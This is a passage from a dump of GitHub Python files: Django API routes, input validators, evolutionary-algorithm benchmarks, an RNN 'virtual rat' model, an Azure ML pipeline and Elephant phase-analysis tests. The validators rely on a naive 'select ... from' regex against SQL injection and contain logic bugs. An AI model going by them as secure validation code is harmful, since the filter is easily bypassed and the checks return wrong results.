directory\r\n","repo_name":"MustafaBiyikli/harmonic-enhancer","sub_path":"harmonic_enhancer.py","file_name":"harmonic_enhancer.py","file_ext":"py","file_size_in_byte":7482,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"18889270883","text":"from django.urls import path\nfrom sign import views_api, views_api_sec\n\nurlpatterns = [\n # sign system interface:\n # ex : /api/add_event/\n path('add_event/', views_api.add_event, name='add_event'),\n # ex : /api/add_guest/\n path('add_guest/', views_api.add_guest, name='add_guest'),\n # ex : /api/get_event_list/\n path('get_event_list/', views_api.get_event_list, name='get_event_list'),\n # ex : /api/get_guest_list/\n path('get_guest_list/', views_api.get_guest_list, name='get_guest_list'),\n # ex : /api/guest_sign/\n path('guest_sign/', views_api.guest_sign, name='guest_sign'),\n\n # security interface:\n # ex : /api/sec_get_event_list/\n path('sec_get_event_list/', views_api_sec.sec_get_event_list, name='sec_get_event_list'),\n # ex : /api/sec_add_event/\n path('sec_add_event/', views_api_sec.sec_add_event, name='sec_add_event'),\n # ex : /api/sec_get_guest_list/\n path('sec_get_guest_list/', views_api_sec.sec_get_guest_list, name='sec_get_guest_list'),\n]\napp_name = 'sign'\n","repo_name":"shelly1205/pythonTest","sub_path":"guest/sign/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12667308951","text":"import re\nimport datetime\n\n\ndef is_zero(val, strip=True):\n\ttry:\n\t\tval = int(str(val).strip()) if strip else int(str(val))\n\t\treturn val == 0\n\texcept ValueError:\n\t\treturn False\n\n\ndef is_int(val, min_value=None, max_value=None, strip=True):\n\ttry:\n\t\tint(str(val).strip()) if strip else int(str(val))\n\t\tres = True\n\t\tif not(min_value is None):\n\t\t\tres = res and res >= min_value\n\t\tif not (max_value is None):\n\t\t\tres = res and res <= min_value\n\t\treturn res\n\texcept ValueError:\n\t\treturn False\n\n\ndef is_year(val, min_year=1000, max_year=9999, strip=True):\n\ttry:\n\t\tval = int(str(val).strip()) if strip else int(str(val))\n\t\treturn val in range(min_year, min(datetime.date.today().year + 100, max_year + 1))\n\texcept ValueError:\n\t\treturn False\n\n\ndef is_month(val, strip=True):\n\ttry:\n\t\tval = int(str(val).strip()) if strip else int(str(val))\n\t\treturn val in range(1, 13)\n\texcept ValueError:\n\t\treturn False\n\n\ndef is_valid_string(val, nosql=True, max_length=5000, strip=True):\n\tif not (val is None) or len(val.strip()) == 0:\n\t\tval = val.strip() if strip else val\n\t\tis_length_fit = len(val) in range(1, max_length + 1 if max_length != -1 else len(val) + 1)\n\t\tif nosql:\n\t\t\treturn is_length_fit and re.match(r'(\\s|\\S)*select\\s+(\\s|\\S)*[a-z]+(\\s|\\S)*\\s+from\\s+(\\s|\\S)*[a-z]+(\\s|\\S)*', val, re.IGNORECASE) is None\n\t\treturn is_length_fit\n\treturn False\n","repo_name":"SimonXwk/onepic","sub_path":"app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28170039754","text":"from clonalg import CloneAlg\nfrom jmetal.operator import BinaryTournamentSelection, PolynomialMutation, SBXCrossover, UniformMutation\nfrom jmetal.problem.singleobjective.unconstrained import Rastrigin\nfrom jmetal.util.termination_criterion import StoppingByEvaluations\nfrom jmetal.core.observer import Observer\nfrom jmetal.operator.selection import RouletteWheelSelection, BestSolutionSelection\nfrom jmetal.core.problem import FloatProblem, FloatSolution\nimport matplotlib.pyplot as plt\nfrom jmetal.core.operator import Crossover\nimport scikit_posthocs as sp\nfrom scipy import stats\nimport numpy as np\nimport math\nimport random, copy\nfrom typing import List\nimport seaborn as sns\nsns.set()\n\n\nclass Ackle(FloatProblem):\n def __init__(self, number_of_variables: int = 10):\n super().__init__()\n self.number_of_objectives = 1\n self.number_of_variables = number_of_variables\n self.number_of_constraints = 0\n\n self.obj_directions = [self.MINIMIZE]\n self.obj_labels = ['f(x)']\n\n self.lower_bound = [-32.768 for _ in range(number_of_variables)]\n self.upper_bound = [32.768 for _ in range(number_of_variables)]\n\n FloatSolution.lower_bound = self.lower_bound\n FloatSolution.upper_bound = self.upper_bound\n\n def evaluate(self, solution: FloatSolution) -> FloatSolution:\n n_rev = 1 / solution.number_of_variables\n x = solution.variables\n sum_of_sqr = 0\n sum_of_cos = 0\n\n for i in range(solution.number_of_variables):\n sum_of_sqr += x[i] * x[i]\n sum_of_cos += math.cos(2 * math.pi * x[i])\n\n result = -20 * math.exp(-0.2 * math.sqrt(n_rev * sum_of_sqr)) \\\n - math.exp(n_rev * sum_of_cos) + 20 + math.exp(1)\n\n solution.objectives[0] = result\n\n return solution\n\n def get_name(self) -> str:\n return \"Ackle's\"\n\n\nclass Schwefel(FloatProblem):\n def __init__(self, number_of_variables: int = 10):\n super().__init__()\n self.number_of_objectives = 1\n self.number_of_variables = number_of_variables\n self.number_of_constraints = 0\n\n self.obj_directions = [self.MINIMIZE]\n self.obj_labels = ['f(x)']\n\n self.lower_bound = [-5.12 for _ in range(number_of_variables)]\n self.upper_bound = [5.12 for _ in range(number_of_variables)]\n\n FloatSolution.lower_bound = self.lower_bound\n FloatSolution.upper_bound = self.upper_bound\n\n def evaluate(self, solution: FloatSolution) -> FloatSolution:\n a = 418.9829\n result = a * solution.number_of_variables\n x = solution.variables\n\n for i in range(solution.number_of_variables):\n result -= x[i] * sin(sqrt(abs(x[i])))\n\n solution.objectives[0] = result\n return solution\n\n def get_name(self) -> str:\n return \"Schwefel's\"\n\n\nclass DiscreteCrossover(Crossover[FloatSolution, FloatSolution]):\n def __init__(self, probability: float):\n super(DiscreteCrossover, self).__init__(probability=probability)\n\n def execute(self, parents: List[FloatSolution]) -> List[FloatSolution]:\n if len(parents) != 2:\n raise Exception('The number of parents is: {}, expected: 2'.format(len(parents)))\n\n offspring = [copy.deepcopy(parents[0]), copy.deepcopy(parents[1])]\n rand = random.random()\n\n if rand <= self.probability:\n permut_len = offspring[0].number_of_variables\n for i in range(permut_len):\n rand = random.random()\n offspring[0].variables[i] = parents[0].variables[i] if rand <= 0.5 else parents[1].variables[i]\n offspring[1].variables[i] = parents[0].variables[i] if rand > 0.5 else parents[1].variables[i]\n\n return offspring\n\n def get_number_of_parents(self) -> int:\n return 2\n\n def get_number_of_children(self) -> int:\n return 2\n\n def get_name(self):\n return 'Discrete crossover'\n\n\nclass DataObserver(Observer):\n\n def __init__(self, frequency: float = 1.0, data = []) -> None:\n \"\"\" Show the number of evaluations, best fitness and computing time.\n :param frequency: Display frequency. \"\"\"\n self.display_frequency = frequency\n self.data = data\n\n def update(self, *args, **kwargs):\n computing_time = kwargs['COMPUTING_TIME']\n evaluations = kwargs['EVALUATIONS']\n solutions = kwargs['SOLUTIONS']\n\n if (evaluations % self.display_frequency) == 0 and solutions:\n if type(solutions) == list:\n fitness = solutions[0].objectives\n else:\n fitness = solutions.objectives\n self.data.append(fitness[0])\n\n\ndef solve(problem, cloning_param, mutation):\n final_data = []\n final_problem = problem(dim)\n final_mutation = mutation(mut_pb, 20)\n\n for x in range(repetitions):\n algorithm = CloneAlg(\n problem=final_problem,\n population_size=100,\n offspring_population_size=100,\n mutation=final_mutation,\n cloning_param=cloning_param,\n termination_criterion=StoppingByEvaluations(max_evaluations=5000)\n )\n data = []\n dataobserver = DataObserver(1.0, data)\n algorithm.observable.register(observer=dataobserver)\n algorithm.run()\n final_data.append(data)\n\n trans_list = np.array(final_data).T.tolist()\n\n fig = plt.figure(figsize=(10, 7))\n ax = fig.add_axes([0, 0, 1, 1])\n bp = ax.boxplot(trans_list)\n plt.title(\"Problem: {0} benchmark, dim: {1}, cloning_param: {2}, mutation: {3}\".format(\n final_problem.get_name(),\n dim,\n algorithm.get_cloning_param(),\n final_mutation.get_name()))\n plt.show()\n\n # Kruskal-Wallis and Dunn tests\n print(stats.kruskal(trans_list[0], trans_list[1], trans_list[-1]))\n sp.posthoc_dunn([trans_list[0], trans_list[1], trans_list[-1]], p_adjust='holm')\n\n\nrepetitions = 10\ndim = 50\nmut_pb = 0.8\n\n[solve(problem, cloning_param, mutation)\n for problem in [Ackle, Schwefel]\n for cloning_param in [0.1, 0.3, 0.6, 0.9]\n for mutation in [UniformMutation, PolynomialMutation]]","repo_name":"wiktorgoral/Evolutionary-Project","sub_path":"clonalSelection/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6934604156","text":"import numpy as npp\nimport minpy.numpy as np\nfrom minpy.nn.model import ModelBase\nfrom minpy.nn import layers\n\nclass VirtualRatModel(ModelBase):\n \"\"\"\n Virtual rat model. An Elman recurrent neural network that takes inputs and output actions for each time step.\n This model can be trained with either supervised learning or reinforcement learning.\n \"\"\"\n def __init__(self, N=1, input_dim=5, hidden_dim=20, output_dim=3,\n gamma=0.99, reg=0.1, noise_factor = 0, total_time_steps=5): \n super(VirtualRatModel, self).__init__()\n self.input_dim = input_dim # (pro, anti, left, right, trial=1)\n self.hidden_dim = hidden_dim # Number of hidden recurrent unit.\n self.output_dim = output_dim # (left, right, do nothing/others)\n self.gamma = gamma # Reward discounting rate.\n self.reg = reg # Regularization strength for L2 regularization.\n self.noise_factor = noise_factor # Coefficient for the strength of noise.\n self.total_time_steps = total_time_steps # Total time steps within each trial.\n # Initialize h0\n self.h0 = np.zeros((N, hidden_dim))\n self.h = self.h0\n self.activation_history = np.zeros((0,N,hidden_dim))\n\n # Initialize parameters for the RNN\n self.add_param(name = 'Wx', shape = (input_dim, hidden_dim))\n self.add_param(name = 'Wh', shape = (hidden_dim, hidden_dim))\n self.add_param(name = 'b', shape = (hidden_dim,))\n\n # Initialize output to vocab weights\n self.add_param(name = 'Wa', shape = (hidden_dim, output_dim))\n self.add_param(name = 'ba', shape = (output_dim,))\n\n self.activation_mask = np.ones((self.total_time_steps,self.hidden_dim))\n self.activation_offset = np.zeros((self.total_time_steps,self.hidden_dim))\n self.tanh_mask = np.ones((self.total_time_steps,self.hidden_dim))\n\n def reset_h(self):\n # Reset hidden activation.\n self.h = self.h0\n\n def reset_history(self):\n # Reset activation history. Call this mothod before testing.\n self.activation_history = np.zeros((0,1,self.hidden_dim))\n\n def get_activation_history(self):\n # Returns activation history in Numpy array, instead of minpy's numpy array.\n return self.activation_history.asnumpy()\n\n def lesion(self, mask = None, offset = None):\n \"\"\"\n Introduce lesion to activation carryover.\n Inputs:\n - time_steps: a tuple, list, or numpy array of shape (M,), \n each element corresponds to a time step.\n - num_neuron: a tuple, list, or numpy array of shape (M,), \n each element corresponds to a index of hidden unit.\n \"\"\"\n self.activation_mask = np.ones((self.total_time_steps,self.hidden_dim))\n self.activation_offset = np.zeros((self.total_time_steps,self.hidden_dim))\n if mask is not None:\n self.activation_mask = mask\n if offset is not None:\n self.activation_offset = offset\n\n def step_forward(self, X):\n \"\"\"\n Each time step calls forward() once. This is necessary for sampling.\n Inputs:\n - X: (N,D) shape\n \"\"\"\n N = X.shape[0]\n output_dim = 3\n\n if X[0,-1] == 1:\n self.h[0,:] = np.zeros((self.hidden_dim,))\n self.h = self._rnn_step(X[:,:], self.h, self.params['Wx'], self.params[\"Wh\"], \n self.params[\"b\"])\n yy = layers.affine(self.h, self.params['Wa'], self.params[\"ba\"]).reshape([N, 1, output_dim])\n numorator = np.exp(yy - np.max(yy, axis=2, keepdims=True))\n denomenator = np.sum(numorator,axis=2,keepdims=True)\n p = numorator/denomenator\n return p\n\n def forward(self, X):\n \"\"\"\n Forward pass for the whole sequence, like supervised learning.\n Inputs:\n - X: (N, T, D) shape\n \"\"\"\n N, T, _ = X.shape\n output_dim = 3\n h_history = np.zeros((T,N,self.hidden_dim))\n y = np.zeros((N,0,output_dim))\n prev_h = self.h0\n for t in xrange(T):\n if X[0,t,-1] == 1:\n prev_h[0,:] = np.zeros((self.hidden_dim,))\n h = self._rnn_step(X[:,t,:], prev_h, self.params['Wx'], self.params[\"Wh\"], \n self.params[\"b\"], self.tanh_mask[t % self.total_time_steps,:])\n \n # Mask certain activations\n hh = h * self.activation_mask[t % self.total_time_steps,:] \\\n + self.activation_offset[t % self.total_time_steps,:]\n\n prev_h = hh \n\n h_history[t,:,:] = hh\n\n yy = layers.affine(hh, self.params['Wa'], self.params[\"ba\"]).reshape([N, 1, output_dim])\n y = np.append(y,yy,axis=1)\n\n numorator = np.exp(y - np.max(y, axis=2, keepdims=True))\n denomenator = np.sum(numorator,axis=2,keepdims=True)\n ps = numorator/denomenator\n self.activation_history = np.append(self.activation_history,h_history,axis=0)\n return ps\n\n def _rnn_step(self, x, prev_h, Wx, Wh, b, tanh_vector=None):\n \"\"\"\n Run the forward pass for a single timestep of a vanilla RNN that uses a tanh\n activation function.\n\n The input data has dimension D, the hidden state has dimension H, and we use\n a minibatch size of N.\n\n Inputs:\n - x: Input data for this timestep, of shape (N, D).\n - prev_h: Hidden state from previous timestep, of shape (N, H)\n - Wx: Weight matrix for input-to-hidden connections, of shape (D, H)\n - Wh: Weight matrix for hidden-to-hidden connections, of shape (H, H)\n - b: Biases of shape (H,)\n\n Returns a tuple of:\n - next_h: Next hidden state, of shape (N, H)\n \"\"\"\n score = np.dot(x, Wx) + np.dot(prev_h, Wh) + b\n score_with_noise = score+ self.noise_factor * np.random.normal(0,1,self.hidden_dim) # White noise with mu=0, sigma=1\n if tanh_vector:\n next_h = np.tanh(( score_with_noise / tanh_vector)) \n else:\n next_h = np.tanh(score_with_noise) \n return next_h\n\n\n def choose_action(self, p):\n \"\"\"\n Input:\n -p: (1,1,D) shape\n \"\"\"\n u = npp.random.uniform()\n p = p[0,0,:]\n a = (npp.cumsum(p) > u).argmax()\n y = a\n return a, y\n\n def loss(self, ps, ys, rs):\n \"\"\"\n Input\n - ps: (N, T, C)\n - ys: (T, N)\n - rs: (T, N)\n \"\"\"\n N, T, C = ps.shape\n ps = np.maximum(1.0e-5, np.minimum(1.0 - 1e-5, ps))\n #convert it to one hot encoding\n onehot_label = np.zeros([N, T, C])\n for t in xrange(T):\n np.onehot_encode(ys[t,:], onehot_label[:,t,:])\n loss = -np.sum(np.sum(np.log(ps) * onehot_label, axis=2) * rs)\n if self.reg>0:\n regloss = loss + 0.5 * self.reg * np.sum(np.sum(self.params['Wh'] * self.params['Wh']) + \\\n np.sum(self.params['Wx'] * self.params['Wx']) + np.sum(self.params['b'] * self.params['b']) + \\\n np.sum(self.params['Wa'] * self.params['Wa']) + np.sum(self.params['ba'] * self.params['ba']))\n else:\n regloss = loss\n return regloss\n\n def discount_rewards(self, rs):\n \"\"\"\n Discount rewards for reinforcement learning.\n \"\"\"\n drs = npp.zeros_like(rs, dtype=npp.float)\n s = 0\n for t in reversed(xrange(0, len(rs))):\n # Reset the running sum at a game boundary.\n if rs[t] != 0:\n s = 0\n s = s * self.gamma + rs[t]\n drs[t] = s\n drs -= np.mean(drs)\n drs /= np.std(drs)\n return drs\n\n\n\n","repo_name":"jacklxc/Virtual-Rat","sub_path":"model/VirtualRatModel.py","file_name":"VirtualRatModel.py","file_ext":"py","file_size_in_byte":7653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5404693491","text":"import json, os\n\nfrom azureml.core import Workspace, Experiment, Datastore, Dataset, ComputeTarget, RunConfiguration, Environment, Model\nfrom azureml.core.runconfig import CondaDependencies\nfrom azureml.pipeline.core import Pipeline, PipelineData, PipelineParameter\nfrom azureml.contrib.pipeline.steps import ParallelRunStep, ParallelRunConfig\nfrom azureml.data.datapath import DataPath, DataPathComputeBinding\nfrom azureml.pipeline.steps import PythonScriptStep\n\n\ndef create_experiment_config(workspace):\n ########################################\n ### Creating data prep Pipeline Step ###\n ########################################\n\n # Load settings\n print(\"Loading settings\")\n data_prep_step_path = os.path.join(\"steps\", \"data_prep\")\n with open(os.path.join(data_prep_step_path, \"step.json\")) as f:\n data_prep_settings = json.load(f)\n \n # Setup datasets - Create PipelineParameter for dynamic pipeline input\n print(\"Setting up datasets with dynamic input\")\n data_prep_input_path = DataPath(\n datastore=Datastore(workspace=workspace, name=data_prep_settings.get(\"datastore_input_name\", \"workspaceblobstore\")),\n path_on_datastore=\"golden/Atlantis/PAX1/15-Mar-2020-23-37-50-279971/PAX1.parquet/\"\n )\n data_prep_input_path_pipeline_parameter = PipelineParameter(\n name=\"input_path\",\n default_value=data_prep_input_path\n )\n data_prep_input = (data_prep_input_path_pipeline_parameter, DataPathComputeBinding(mode=\"mount\"))\n data_prep_output = PipelineData(\n name=data_prep_settings.get(\"dataset_output_name\", None),\n datastore=Datastore(workspace=workspace, name=data_prep_settings.get(\"datastore_output_name\", \"workspaceblobstore\")),\n output_mode=\"mount\"\n ).as_dataset()\n # Uncomment next lines, if you want to register intermediate dataset\n #data_prep_output.register(\n # name=data_prep_settings.get(\"dataset_output_name\", None),\n # create_new_version=True\n #)\n\n # Create conda dependencies\n print(\"Creating conda dependencies\")\n data_prep_dependencies = CondaDependencies.create(\n pip_packages=data_prep_settings.get(\"pip_packages\", []),\n conda_packages=data_prep_settings.get(\"conda_packages\", []),\n python_version=data_prep_settings.get(\"python_version\", \"3.6.2\")\n )\n\n # Create run configuration\n print(\"Creating RunConfiguration\")\n data_prep_run_config = RunConfiguration(\n conda_dependencies=data_prep_dependencies,\n framework=data_prep_settings.get(\"framework\", \"Python\")\n )\n\n # Loading compute target \n print(\"Loading ComputeTarget\")\n data_prep_compute_target = ComputeTarget(\n workspace=workspace,\n name=data_prep_settings.get(\"compute_target_name\", None)\n )\n\n # Create python step\n print(\"Creating Step\")\n data_prep = PythonScriptStep(\n name=data_prep_settings.get(\"step_name\", None),\n script_name=data_prep_settings.get(\"script_name\", None),\n arguments=data_prep_settings.get(\"arguments\", []) + [\"--input-datapath\", data_prep_input],\n compute_target=data_prep_compute_target,\n runconfig=data_prep_run_config,\n inputs=[data_prep_input],\n outputs=[data_prep_output],\n params=data_prep_settings.get(\"parameters\", []),\n source_directory=data_prep_step_path,\n allow_reuse=data_prep_settings.get(\"allow_reuse\", True),\n version=data_prep_settings.get(\"version\", None),\n )\n\n ############################################\n ### Creating inference Parallel Run Step ###\n ############################################\n\n # Load settings\n print(\"Loading settings\")\n batch_inference_step_path = os.path.join(\"steps\", \"batch_inference\")\n with open(os.path.join(batch_inference_step_path, \"step.json\")) as f:\n batch_inference_settings = json.load(f)\n\n # Setup datasets of first step\n print(\"Setting up datasets\")\n batch_inference_input = data_prep_output.as_named_input(name=batch_inference_settings.get(\"dataset_input_name\", None))\n batch_inference_output = PipelineData(\n name=batch_inference_settings.get(\"dataset_output_name\", None),\n datastore=Datastore(workspace=workspace, name=batch_inference_settings.get(\"datastore_output_name\", None)),\n output_mode=\"mount\",\n ).as_dataset()\n # Uncomment next lines, if you want to register intermediate dataset\n #batch_inference_output.register(\n # name=batch_inference_settings.get(\"dataset_output_name\", None),\n # create_new_version=True\n #)\n\n # Create conda dependencies\n print(\"Creating conda dependencies\")\n batch_inference_dependencies = CondaDependencies.create(\n pip_packages=batch_inference_settings.get(\"pip_packages\", []),\n conda_packages=batch_inference_settings.get(\"conda_packages\", []),\n python_version=batch_inference_settings.get(\"python_version\", \"3.6.2\")\n )\n\n # Create run configuration\n print(\"Creating RunConfiguration\")\n data_prep_run_config = RunConfiguration(\n conda_dependencies=batch_inference_dependencies,\n framework=batch_inference_settings.get(\"framework\", \"Python\")\n )\n\n # Loading compute target \n print(\"Loading ComputeTarget\")\n batch_inference_compute_target = ComputeTarget(\n workspace=workspace,\n name=batch_inference_settings.get(\"compute_target_name\", None)\n )\n\n # Create python step\n print(\"Creating Step\")\n batch_inference = PythonScriptStep(\n name=batch_inference_settings.get(\"step_name\", None),\n script_name=batch_inference_settings.get(\"script_name\", None),\n arguments=batch_inference_settings.get(\"arguments\", []),\n compute_target=batch_inference_compute_target,\n runconfig=data_prep_run_config,\n inputs=[batch_inference_input],\n outputs=[batch_inference_output],\n params=batch_inference_settings.get(\"parameters\", []),\n source_directory=batch_inference_step_path,\n allow_reuse=batch_inference_settings.get(\"allow_reuse\", True),\n version=batch_inference_settings.get(\"version\", None),\n )\n \n #########################\n ### Creating Pipeline ###\n #########################\n\n # Create Pipeline\n print(\"Creating Pipeline\")\n pipeline = Pipeline(\n workspace=workspace,\n steps=[batch_inference],\n description=\"Batch Inference Pipeline\",\n )\n\n return pipeline\n\n\nif __name__ == \"__main__\":\n # Load workspace\n print(\"Load Workspace\")\n ws = Workspace.from_config()\n\n # Load experiment config\n print(\"Loading experiment config\")\n config = create_experiment_config(workspace=ws)\n\n # Load experiment\n print(\"Loading experiment\")\n experiment = Experiment(\n workspace=ws,\n name=\"myexperiment_inference\"\n )\n\n # Submit experiment config\n print(\"Submitting experiment config\")\n run = experiment.submit(\n config=config,\n tags={}\n )\n run.wait_for_completion(show_output=True)","repo_name":"soniaang/ProjectGemini","sub_path":"inference_pipeline/inference_pipeline.py","file_name":"inference_pipeline.py","file_ext":"py","file_size_in_byte":7010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37726227222","text":"from __future__ import division, print_function\n\nimport unittest\n\nimport numpy as np\nimport quantities as pq\nimport scipy.io\nfrom neo import SpikeTrain, AnalogSignal\nfrom numpy.ma.testutils import assert_allclose\n\nimport elephant.phase_analysis\nfrom elephant.datasets import download_datasets\n\n\nclass SpikeTriggeredPhaseTestCase(unittest.TestCase):\n\n def setUp(self):\n tlen0 = 100 * pq.s\n f0 = 20. * pq.Hz\n fs0 = 1 * pq.ms\n t0 = np.arange(\n 0, tlen0.rescale(pq.s).magnitude,\n fs0.rescale(pq.s).magnitude) * pq.s\n self.anasig0 = AnalogSignal(\n np.sin(2 * np.pi * (f0 * t0).simplified.magnitude),\n units=pq.mV, t_start=0 * pq.ms, sampling_period=fs0)\n self.st0 = SpikeTrain(\n np.arange(50, tlen0.rescale(pq.ms).magnitude - 50, 50) * pq.ms,\n t_start=0 * pq.ms, t_stop=tlen0)\n self.st1 = SpikeTrain(\n [100., 100.1, 100.2, 100.3, 100.9, 101.] * pq.ms,\n t_start=0 * pq.ms, t_stop=tlen0)\n\n def test_perfect_locking_one_spiketrain_one_signal(self):\n phases, amps, times = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n self.st0,\n interpolate=True)\n\n assert_allclose(phases[0], - np.pi / 2.)\n assert_allclose(amps[0], 1, atol=0.1)\n assert_allclose(times[0].magnitude, self.st0.magnitude)\n self.assertEqual(len(phases[0]), len(self.st0))\n self.assertEqual(len(amps[0]), len(self.st0))\n self.assertEqual(len(times[0]), len(self.st0))\n\n def test_perfect_locking_many_spiketrains_many_signals(self):\n phases, amps, times = elephant.phase_analysis.spike_triggered_phase(\n [\n elephant.signal_processing.hilbert(self.anasig0),\n elephant.signal_processing.hilbert(self.anasig0)],\n [self.st0, self.st0],\n interpolate=True)\n\n assert_allclose(phases[0], -np.pi / 2.)\n assert_allclose(amps[0], 1, atol=0.1)\n assert_allclose(times[0].magnitude, self.st0.magnitude)\n self.assertEqual(len(phases[0]), len(self.st0))\n self.assertEqual(len(amps[0]), len(self.st0))\n self.assertEqual(len(times[0]), len(self.st0))\n\n def test_perfect_locking_one_spiketrains_many_signals(self):\n phases, amps, times = elephant.phase_analysis.spike_triggered_phase(\n [\n elephant.signal_processing.hilbert(self.anasig0),\n elephant.signal_processing.hilbert(self.anasig0)],\n [self.st0],\n interpolate=True)\n\n assert_allclose(phases[0], -np.pi / 2.)\n assert_allclose(amps[0], 1, atol=0.1)\n assert_allclose(times[0].magnitude, self.st0.magnitude)\n self.assertEqual(len(phases[0]), len(self.st0))\n self.assertEqual(len(amps[0]), len(self.st0))\n self.assertEqual(len(times[0]), len(self.st0))\n\n def test_perfect_locking_many_spiketrains_one_signal(self):\n phases, amps, times = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n [self.st0, self.st0],\n interpolate=True)\n\n assert_allclose(phases[0], -np.pi / 2.)\n assert_allclose(amps[0], 1, atol=0.1)\n assert_allclose(times[0].magnitude, self.st0.magnitude)\n self.assertEqual(len(phases[0]), len(self.st0))\n self.assertEqual(len(amps[0]), len(self.st0))\n self.assertEqual(len(times[0]), len(self.st0))\n\n def test_interpolate(self):\n phases_int, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n self.st1,\n interpolate=True)\n\n self.assertLess(phases_int[0][0], phases_int[0][1])\n self.assertLess(phases_int[0][1], phases_int[0][2])\n self.assertLess(phases_int[0][2], phases_int[0][3])\n self.assertLess(phases_int[0][3], phases_int[0][4])\n self.assertLess(phases_int[0][4], phases_int[0][5])\n\n phases_noint, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n self.st1,\n interpolate=False)\n\n self.assertEqual(phases_noint[0][0], phases_noint[0][1])\n self.assertEqual(phases_noint[0][1], phases_noint[0][2])\n self.assertEqual(phases_noint[0][2], phases_noint[0][3])\n self.assertEqual(phases_noint[0][3], phases_noint[0][4])\n self.assertNotEqual(phases_noint[0][4], phases_noint[0][5])\n\n # Verify that when using interpolation and the spike sits on the sample\n # of the Hilbert transform, this is the same result as when not using\n # interpolation with a spike slightly to the right\n self.assertEqual(phases_noint[0][2], phases_int[0][0])\n self.assertEqual(phases_noint[0][4], phases_int[0][0])\n\n def test_inconsistent_numbers_spiketrains_hilbert(self):\n self.assertRaises(\n ValueError, elephant.phase_analysis.spike_triggered_phase,\n [\n elephant.signal_processing.hilbert(self.anasig0),\n elephant.signal_processing.hilbert(self.anasig0)],\n [self.st0, self.st0, self.st0], False)\n\n self.assertRaises(\n ValueError, elephant.phase_analysis.spike_triggered_phase,\n [\n elephant.signal_processing.hilbert(self.anasig0),\n elephant.signal_processing.hilbert(self.anasig0)],\n [self.st0, self.st0, self.st0], False)\n\n def test_spike_earlier_than_hilbert(self):\n # This is a spike clearly outside the bounds\n st = SpikeTrain(\n [-50, 50],\n units='s', t_start=-100 * pq.s, t_stop=100 * pq.s)\n phases_noint, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n st,\n interpolate=False)\n self.assertEqual(len(phases_noint[0]), 1)\n\n # This is a spike right on the border (start of the signal is at 0s,\n # spike sits at t=0s). By definition of intervals in\n # Elephant (left borders inclusive, right borders exclusive), this\n # spike is to be considered.\n st = SpikeTrain(\n [0, 50],\n units='s', t_start=-100 * pq.s, t_stop=100 * pq.s)\n phases_noint, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n st,\n interpolate=False)\n self.assertEqual(len(phases_noint[0]), 2)\n\n def test_spike_later_than_hilbert(self):\n # This is a spike clearly outside the bounds\n st = SpikeTrain(\n [1, 250],\n units='s', t_start=-1 * pq.s, t_stop=300 * pq.s)\n phases_noint, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n st,\n interpolate=False)\n self.assertEqual(len(phases_noint[0]), 1)\n\n # This is a spike right on the border (length of the signal is 100s,\n # spike sits at t=100s). However, by definition of intervals in\n # Elephant (left borders inclusive, right borders exclusive), this\n # spike is not to be considered.\n st = SpikeTrain(\n [1, 100],\n units='s', t_start=-1 * pq.s, t_stop=200 * pq.s)\n phases_noint, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n st,\n interpolate=False)\n self.assertEqual(len(phases_noint[0]), 1)\n\n # This test handles the correct dealing with input signals that have\n # different time units, including a CompoundUnit\n def test_regression_269(self):\n # This is a spike train on a 30KHz sampling, one spike at 1s, one just\n # before the end of the signal\n cu = pq.CompoundUnit(\"1/30000.*s\")\n st = SpikeTrain(\n [30000., (self.anasig0.t_stop - 1 * pq.s).rescale(cu).magnitude],\n units=pq.CompoundUnit(\"1/30000.*s\"),\n t_start=-1 * pq.s, t_stop=300 * pq.s)\n phases_noint, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n st,\n interpolate=False)\n self.assertEqual(len(phases_noint[0]), 2)\n\n\nclass MeanVectorTestCase(unittest.TestCase):\n def setUp(self):\n self.tolerance = 1e-15\n self.n_samples = 200\n # create a sample with all values equal to a random phase-lock phi\n self.lock_value_phi = np.random.uniform(-np.pi, np.pi, 1)\n self.dataset1 = np.ones(self.n_samples) * self.lock_value_phi\n # create a evenly spaced / uniform distribution\n self.dataset2 = np.arange(0, 2 * np.pi, (2 * np.pi) / self.n_samples)\n # create a random distribution\n self.dataset3 = np.random.uniform(-np.pi, np.pi, self.n_samples)\n\n def testMeanVector_direction_is_phi_and_length_is_1(self):\n \"\"\"\n Test if the mean vector length is 1 and if the mean direction is phi\n for a sample with all phases equal to phi on the unit circle.\n\n \"\"\"\n theta_bar_1, r_1 = elephant.phase_analysis.mean_phase_vector(\n self.dataset1)\n # mean direction must be phi\n self.assertAlmostEqual(theta_bar_1, self.lock_value_phi,\n delta=self.tolerance)\n # mean vector length must be almost equal 1\n self.assertAlmostEqual(r_1, 1, delta=self.tolerance)\n\n def testMeanVector_length_is_0(self):\n \"\"\"\n Test if the mean vector length is 0 for a evenly spaced distribution\n on the unit circle.\n \"\"\"\n theta_bar_2, r_2 = elephant.phase_analysis.mean_phase_vector(\n self.dataset2)\n # mean vector length must be almost equal 0\n self.assertAlmostEqual(r_2, 0, delta=self.tolerance)\n\n def 